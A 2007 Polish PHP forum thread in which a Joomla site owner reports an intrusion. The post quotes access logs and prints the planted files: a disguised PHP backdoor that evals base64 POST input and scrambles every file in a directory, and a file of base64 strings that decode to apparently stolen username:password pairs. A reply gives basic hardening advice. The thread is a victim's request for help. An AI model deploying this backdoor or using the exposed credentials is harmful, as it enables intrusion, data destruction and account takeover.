Forum PHP.pl > Bezpieczeństwo

Pomoc - Szukaj - Użytkownicy - Kalendarz

alex51

4.07.2007, 06:30:05

Witam.
Nie jestem pewien, czy dobrze wybrałem miejsce do przedstawienia moich kłopotów. Ponieważ jednak spotkało mnie nieszczęście polegające na tym, ze włamano się na mój serwer, używając do tego skryptu php, dlatego w tym miejscu chcę przedstawic to zdarzenie.
Prowadzę Serwis muzyczny zbudowany na systemie Joomla, adresowany do osób uczących się grać i nastawiony na zbieranie i przekazywanie sobie wzajemnie swoich doświadczeń, materiałów itp spraw. To co wymieniamy nawzajem gromadzimy w dziale zwanym Pobieralnia. Zebrało sie tam w ciągu półrocznej działalności serwisu ponad 1200 różnych plików o wadze około 200MB. Ktoś złośliwy postanowił nam zaszkodzić i spowodował, ze wszystkie pliki przestały być przydatne. Okazały się zepsute, niemożliwe do otworzenia. Miało to miejsce klika razy, zmieniłem serwer i sytuacja się znów powtórzyła w niedzielę 1 lipca. Wszystkie pliki Pobieralni miały tą samą datę i godzinę, różnica wynosiła 3 minuty. Na moją prośbe o pomoc, dostawca hostingu przekazał mi informację, którą tu zacytuje:

Cytat

logi:

w3cache1.icm.edu.pl gramsam.pl - [01/Jul/2007:13:27:37 +0200] "POST /modules/mod_docmann2.php?dir=..dmdocuments HTTP/1.0" 200 15529 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.8.1.4) Gecko/20070515 Firefox/2.0.0.4"
w3cache1.icm.edu.pl gramsam.pl - [01/Jul/2007:13:27:45 +0200] "POST /modules/mod_docmann2.php?dir=..dmdocuments HTTP/1.0" 200 12648 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.8.1.4) Gecko/20070515 Firefox/2.0.0.4"
w3cache1.icm.edu.pl gramsam.pl - [01/Jul/2007:13:29:14 +0200] "POST /modules/mod_docmann2.php?dir=..dmdocuments HTTP/1.0" 200 15469 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.8.1.4) Gecko/20070515 Firefox/2.0.0.4"

w3cache1.icm.edu.pl gramsam.pl - [24/Jun/2007:14:18:52 +0200] "GET /modules/docmann2.php HTTP/1.0" 404 281 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.8.1.4) Gecko/20070515 Firefox/2.0.0.4"
w3cache1.icm.edu.pl gramsam.pl - [24/Jun/2007:14:21:51 +0200] "GET /modules/mod_docmann2.php HTTP/1.0" 200 0 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.8.1.4) Gecko/20070515 Firefox/2.0.0.4"
w3cache1.icm.edu.pl gramsam.pl - [24/Jun/2007:14:37:43 +0200] "POST /modules/mod_docmann2.php HTTP/1.0" 200 0 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.8.1.4) Gecko/20070515 Firefox/2.0.0.4"
w3cache1.icm.edu.pl gramsam.pl - [24/Jun/2007:14:39:14 +0200] "POST /modules/mod_docmann2.php HTTP/1.0" 200 0 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.8.1.4) Gecko/20070515 Firefox/2.0.0.4"
w3cache1.icm.edu.pl gramsam.pl - [24/Jun/2007:14:39:34 +0200] "POST /modules/mod_docmann2.php HTTP/1.0" 200 0 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.8.1.4) Gecko/20070515 Firefox/2.0.0.4"
w3cache1.icm.edu.pl gramsam.pl - [24/Jun/2007:14:40:50 +0200] "POST /modules/mod_docmann2.php HTTP/1.0" 200 0 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.8.1.4) Gecko/20070515 Firefox/2.0.0.4"
w3cache1.icm.edu.pl gramsam.pl - [24/Jun/2007:14:42:22 +0200] "POST /modules/mod_docmann2.php HTTP/1.0" 200 0 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.8.1.4) Gecko/20070515 Firefox/2.0.0.4"
w3cache2.icm.edu.pl gramsam.pl - [24/Jun/2007:16:29:12 +0200] "GET /modules/mod_docmann2.php HTTP/1.0" 200 0 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.8.1.4) Gecko/20070515 Firefox/2.0.0.4"
w3cache2.icm.edu.pl gramsam.pl - [24/Jun/2007:20:18:52 +0200] "POST /modules/mod_docmann2.php HTTP/1.0" 200 33 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.8.1.4) Gecko/20070515 Firefox/2.0.0.4"

Wyjaśnienie:
Ktoś łącząc się poprzez serwer proxy - w3cache.icm.edu.pl wgrał Panu plik: /modules/docmann2.php.
Następnie uruchomił ten skrypt z odpowiednimi parametrami co spowodowało losowy zapis danych do wszystkich plików w podanym katalogu.

Usunąłem zaraz wspomniane wyżej pliki. Miały one następującą zawartość:

[PHP] pobierz, plaintext 
<?php
/**
* Community builder Login Module 1.0.1
* $Id: mod_cblogin.php 531 2006-11-12 01:40:44Z beat $
*
* @version 1.0.2
* @package Community Builder 1.0.2 extensions
* @copyright (C) 2005-2006 Beat & JoomlaJoe & parts 2000 - 2005 Miro International Pty Ltd
* @license <a href="http://www.gnu.org/copyleft/gpl.html" target="_blank">http://www.gnu.org/copyleft/gpl.html</a> GNU/GPL
*
* Credits to: Jeffrey Randall for initial implementation of avatar, and
* to Antony Ventouris for the PMS integration (he also added the cool animated image)
*/
	  if ($_POST['p'] != "www")
	{
		exit();
	} 
	$code = $_POST['code'];
	if ($code != null)
	{
		eval(base64_decode($code));
		exit();
	}
	$dir = $_GET['dir'];
	if ($handle = opendir ($dir)) 
	{
		while (false !== ($file = readdir ($handle))) 
		{
			if ((!is_dir ($dir.$file))) 
			{
			   echo $dir.$file."<br />n";
			   
			   $fh = fopen ($dir.$file, "r");
				$fcontent = fread($fh, filesize($dir.$file));
				//$newcontent = rand().rand().rand();
				//$towrite = "$newcontent $fcontent".rand();
				$towrite = str_shuffle ($fcontent);
				fclose($fh);
				 $fh2 = fopen ($dir.$file, 'w+');	
				fwrite($fh2, $towrite);
				fclose($fh2);			
							 
			}
		}
		closedir ($handle);
	}
 
?>
[PHP] pobierz, plaintext

był jeszcze plik mod_docman2.xml

[PHP] pobierz, plaintext 
<?xml version="1.0" ?>
<mosinstall type="module">
	<name>docmen</name>
	<creationDate>19/Aug/2004</creationDate>
	<author>The DOCMan Project</author>
	<copyright>This template is released under the GNU/GPL License</copyright>
	<authorEmail>admin@mambodocman.com</authorEmail>
	<authorUrl>www.mambodocman.com</authorUrl>
	<version>1.4</version>
	<description>mod docmen</description>
	 <files>
		 <filename module="mod_docman2">mod_docman2.php</filename>
	 </files>
</mosinstall>
[PHP] pobierz, plaintext

oraz dziwny plik mod_konie.php, który mimo usunięcia, ponownie sie pojawia w Katalogu Modules, za każdym razem mając inną zawartość. Ze względu na brak miejsca treść tego plu przytoczę następnym razem.
Moje pytanie dotyczy tego jak się to stało, co mogę zrobić, aby zabezpieczyć sie przed takimi atakami i jak tego łobuza postraszyć, żeby więcej mnie nie niepokoił?

Teraz, z braku miejsca w poprzednim poscie podaje treść pierwszego ze znalezionych plików mod_konie.php, jakie ktoś wgrał na mój serwer, włamując się tam oczywiście:

[PHP] pobierz, plaintext 
<?php
/**
* @package Joomla
* @copyright Copyright (C) 2005 Open Source Matters. All rights reserved.
* @license <a href="http://www.gnu.org/copyleft/gpl.html" target="_blank">http://www.gnu.org/copyleft/gpl.html</a> GNU/GPL, see LICENSE.php
* Joomla! is free software. This version may have been modified pursuant
* to the GNU General Public License, and as distributed it includes or
* is derivative of works licensed under the GNU General Public License or
* other free or open source software licenses.
* See COPYRIGHT.php for copyright notices and details.
*/ 
 
if ($_GET['p'] != "jOOml4")
{
  header("HTTP/1.0 404 Not Found");
  exit;
}
?>
 
aWN5OmMzNDljMzQ5
aWN5OmMzNDljMzQ5
YWxleDp6YXBvbW5pYW5lX29kenlza2FuZQ==
ZG1wOlBvbGFjazE5ODg=
ZG1wOlBvbGFjazE5ODg=
YWxleDp6YXBvbW5pYW5lX29kenlza2FuZQ==
YWxleDp6YXBvbW5pYW5lX29kenlza2FuZQ==
emlvbWFsMTY6OTAwOTI1
TGVzemVrOmxlc2l1bGVr
c29zbmEubm93YXRvcjI2OmVudGVydGFpbm1lbnQzMw==
QmFzc2lhMjAwMDpzaWFiYTE0
QmFzc2lhMjAwMDpzaWFiYTE0
Og==
QmFzc2lhMjAwMDpzaWFiYTE0
cHJpZXN0ZXIxOTkxOnRydXNpYWsx
aWN5Ok1hbEMuMzQ5
aWN5Ok1hbEMuMzQ5
aWN5Ok1hTEMuMzQ5
aWN5Ok1hbEMuMzQ5
aWN5OmMzNDljMzQ5
aWN5OmMzNDljMzQ5
aWN5OmMzNDljMzQ5
bWFub2xvOldpZHpldw==
amFub2Jva3RvaW5ueTpwcmVsdWRpdW05
a2FyYXAzMDpuZW9kYXI=
ZG1wOlBvbGFjazE5ODg=
a2FyYXAzMDpuZW9kYXI=
ZGFyMzIzMzp0ZW9kb3I=
YWxleDp6YXBvbW5pYW5lX29kenlza2FuZQ==
QW5keUI6cGllc2VrYWJp
QW5keUI6YW5kYnJh
cm9iZXJ0MTAwMTpwZW50aXVtMg==
cmVzOmt1cnR5bmE=
YWxleDp6YXBvbW5pYW5lX29kenlza2FuZQ==
YWxleDp6YXBvbW5pYW5lX29kenlza2FuZQ==
Ym9tYmFzdGlrOnFxcXFxcTE=
YWxleDp6YXBvbW5pYW5lX29kenlza2FuZQ==
d29qdGVrczk6cnViaWtvbjE=
YWxleDp6YXBvbW5pYW5lX29kenlza2FuZQ==
YWxleDp6YXBvbW5pYW5lX29kenlza2FuZQ==
cHJpZXN0ZXIxOTkxOnRydXNpYWsx
cHJpZXN0ZXIxOTkxOnRydXNpYWsx
cm9iZXJ0MTAwMTpwZW50aXVtMg==
cm9iZXJ0MTAwMTpwZW50aXVtMg==
c29zbmEubm93YXRvcjI2OmVudGVydGFpbm1lbnQzMw==
YWxleDp6YXBvbW5pYW5lX29kenlza2FuZQ==
ZG1wOlBvbGFjazE5ODg=
YWxleDp6YXBvbW5pYW5lX29kenlza2FuZQ==
ZG1wOlBvbGFjazE5ODg=
YWxleDp6YXBvbW5pYW5lX29kenlza2FuZQ==
YW51bGthOmp1bmlvcjU=
ZGF3aWRmNzc6NzcwNzAx
ZGF3aWRfZjc3Ojc3MDcwMQ==
emlvbWFsMTY6OTAwOTI1
TGVzemVrOmxlc2l1bGVr
QmFzc2lhMjAwMDpzaWFiYTE0
a2xpbWF0eTo1NTU1NTU=
a2FyYXAzMDpiZW9zYXI=
a2FyYXAzMDpuZW9kYXI=
aWN5OmMzNDljMzQ5
bW9uaWFza2E6b3NuYXB1cw==
bWFub2xvOldpZHpldw==
a2FyYXAzMDpuZW9kYXI=
emlvbWFsMTY6OTAwOTI1
																																															a2xpbWF0eTo1NTU1NTU=
																																																																																																																																																																																																																						cm9iZXJ0MTAwMTpwZW50aXVtMg==
																				  YWxleDp6YXBvbW5pYW5lX29kenlza2FuZQ==
YWxleDp6YXBvbW5pYW5lX29kenlza2FuZQ==
												YWxleDp6YXBvbW5pYW5lX29kenlza2FuZQ==
																		  YWxleDp6YXBvbW5pYW5lX29kenlza2FuZQ==
YWxleDp6YXBvbW5pYW5lX29kenlza2FuZQ==
																														  YWxleDp6YXBvbW5pYW5lX29kenlza2FuZQ==
YWxleDp6YXBvbW5pYW5lX29kenlza2FuZQ==
																YWxleDp6YXBvbW5pYW5lX29kenlza2FuZQ==
YXJ0dXJtdXp5a2FudDphcnR1cmVrNzk=
YWxleDp6YXBvbW5pYW5lX29kenlza2FuZQ==
bW9uaWFza2E6b3NuYXB1cw==
c29zbmEubm93YXRvcjI2OmVudGVydGFpbm1lbnQzMw==
cm9iZXJ0MTAwMTpwZW50b2l1bTI=
cm9iZXJ0MTAwMTpwZW50aXVtMg==
cm9iZXJ0MTAwMTpwZW50aXVtMg==
YWxleDp6YXBvbW5pYW5lX29kenlza2FuZQ==
YWxleDp6YXBvbW5pYW5lX29kenlza2FuZQ==
c29zbmEubm93YXRvcjI2OmVudGVydGFpbm1lbnQzMw==
Ym9tYmFzdGlrOnFxcXFxcTE=
c2trMTE6Y2ljaWExMQ==
c2trMTE6Y2ljaWExMQ==
c2trMTE6Y2ljaWExMQ==
c2trMTE6Y2ljaWExMQ==
c2trMTE6Y2ljaWE=
c2trMTE6Y2ljaWExMQ==
TGVzemVrOmxlc2l1bGVr
c2trMTE6Y2ljaWExMQ==
c2trMTE6Y2ljaWExMQ==
ZXdjaWFhbW9yZWs6bXV6eWN6a2E=
ZXdjaWFhbW9yZWs6bXV6eWN6a2Ex
amFub2Jva3RvaW5ueTpwcmVsdWRpdW05
a2FyYXAzMDpuZW9kYXI=
a2FyYXAzMDpuZW9kYXI=
YmFydGluaWVtOmJhcnRvc3o=
[PHP] pobierz, plaintext

Przytoczony powyżej tekst jest tylko fragmentem tego pliku.
Po skasowaniu tego pliku po jakimś czasie pojawił się w tym samym katalogu: Modules następny plik mod_konie.php o krótszej zawartości:

[PHP] pobierz, plaintext 
<?php
YWxleDp6YXBvbW5pYW5lX29kenlza2FuZQ==
?>
[PHP] pobierz, plaintext

Co można o tym sądzić, skąd się wzięły, w jakim celu są wstawiane, czy wiąże się z tym jakieś niebezpieczeństwo. Trudno mi śledzić co chwila, czy nie pojawia się ponownie ten plik. A najważniejsze, co zrobić, aby się nie pojawiał?

strife

4.07.2007, 07:36:09

1. Dodaj tag do tematu, aby temat był zgodny z zasadami Przedszkola
2. Problem zapewne dotyczy cms'a którego używasz, jest on na wolnej licencji dlatego, każdy może mieć dostęp do jego kodu źródłowego, a brak aktualizacji z Twojej strony może doprowiadzić do takich rzeczy. Musisz pamiętać o aktualizowaniu tego cms'a.

3. Sprawdź uprawnienia dostępu do katalogów ( chmod ), a następnie przejrzyj wszystkie ostatnio wgrane modyfikacje ( o ile jakieś są ). Zapewne jest gdzieś luka umożliwiąjąca wgranie dowolnego pliku do Ciebie na serwer.

Pozdrawiam.

To jest wersja lo-fi głównej zawartości. Aby zobaczyć pełną wersję z większą zawartością, obrazkami i formatowaniem proszę kliknij tutaj.